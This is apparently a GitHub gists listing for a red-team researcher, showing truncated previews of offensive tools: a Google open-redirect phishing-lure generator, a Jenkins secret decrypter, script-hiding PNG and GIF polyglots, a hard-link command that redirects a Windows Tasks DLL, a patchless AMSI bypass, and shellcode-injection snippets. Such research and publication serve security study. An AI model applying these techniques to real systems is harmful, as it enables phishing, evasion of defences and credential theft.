Skip to content

Instantly share code, notes, and snippets.

View djhohnstein's full-sized avatar

Dwight Hohnstein djhohnstein

812 followers · 6 following
View GitHub Profile
@djhohnstein
djhohnstein / google_lure.py
Created December 1, 2022 04:05 — forked from ustayready/google_lure.py
Generate phishing lures that exploit open-redirects from www.google.com using Google Docs
from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from apiclient import errors
import re
from bs4 import BeautifulSoup as Soup
@djhohnstein
djhohnstein / JenkinsDecrypter.py
Last active October 22, 2022 23:23
Decrypt jenkins secrets with all key material from disk
#!/usr/bin/env python3
import re
import sys
import base64
from hashlib import sha256
from binascii import hexlify, unhexlify
from Crypto.Cipher import AES
from xml.dom import minidom
from pprint import pprint
@djhohnstein
djhohnstein / FastDoubling.cs
Created July 26, 2022 20:31
FastDoubling - Mod RSA 129
using System;
class GFG{
// Function calculate the N-th fibonacci
// number using fast doubling method
static void FastDoubling(BigInteger n, BigInteger []res)
{
BigInteger a, b, c, d;
BigInteger MOD = new BigInteger ("114381625757888867669235779976146612010218296721242362562561842935706935245733897830597123563958705058989075147599290026879543541",10);
@djhohnstein
djhohnstein / pnginator.rb
Created July 26, 2022 20:31
pnginator: pack Javascript into a self-extracting PNG
#!/usr/bin/env ruby -w
# pnginator.rb: pack a .js file into a PNG image with an HTML payload;
# when saved with an .html extension and opened in a browser, the HTML extracts and executes
# the javascript.
# Usage: ruby pnginator.rb input.js output.png.html
# By Gasman <http://matt.west.co.tt/>
# from an original idea by Daeken: http://daeken.com/superpacking-js-demos
@djhohnstein
djhohnstein / gifjs.asm
Created July 26, 2022 20:31
A Valid GIF and JS file
; a hand-made GIF containing valid JavaScript code
; abusing header to start a JavaScript comment
; inspired by Saumil Shah's Deadly Pixels presentation
; Ange Albertini, BSD Licence 2013
; yamal gifjs.asm -o img.gif
WIDTH equ 10799 ; equivalent to 2f2a, which is '/*' in ASCII, thus starting an opening comment
@djhohnstein
djhohnstein / Update_Notes.md
Created July 26, 2022 20:31
You have found THE coolest gist :) Come to DerbyCon to learn more. Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

@djhohnstein
djhohnstein / output example.md
Created July 26, 2022 20:19
Shellcode as Numbers - A different kind of calc 
16683189189467061193223884768707748125115707836338683708165636755281807331517563442745553664246724105870945763631169132260927526462734007835204880152893128450692630721572368535326118279180786621255867502609753166175114825563868872386555313011639026159359514256068100949221759953685226158201564474886176814194560402374867089196278252086615234757715302275261377043585010851175293923132633446346692061723922182900523634608569996664845671316859814804344017463762348282301284946271053184374916659024239637068041261659983151054361127497750752691523039603283781627522436175359723245473438312970933225984151370749165828689332628371556231892597912020228904274172
166831891894670611932238847687077481251157078363386837081656367552818073315175634427455536642467241058709457636311691322609275264627340078352048801528931284506926307215723685353261182791807866212558675026097531661751148255638688723865553130116390261593595142560681009492217599536852261582015644748861768141945604023748670891962782520866152347577153022752613770435850
@djhohnstein
djhohnstein / patchless_amsi.h
Created April 18, 2022 15:09 — forked from CCob/patchless_amsi.h
In-Process Patchless AMSI Bypass
#ifndef PATCHLESS_AMSI_H
#define PATCHLESS_AMSI_H
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
@djhohnstein
djhohnstein / sc.js
Created February 2, 2022 15:35
DynamicWrapperX - Register Code Example
//Example Reference:
// https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/
// Test
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools';
// Change that C:\\Tools to a location you specify, or dynamically find current directory.
// ActCTX will search for the DLL in TMP
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>';
@djhohnstein
djhohnstein / syscall.pl
Created October 27, 2021 18:08 — forked from monoxgas/syscall.pl
Perl syscall/sc injection for MacOS
use DynaLoader;
use Devel::Peek;
use Fcntl;
use 5.008001; # because 5.6 doesn't have B::PV::object_2svref
use Config;
use B (); # for B::PV
sub mmap {
my ($addr, $size, $protect, $flags) = @_;
syscall(197, $addr, $size, $protect, $flags, -1, 0);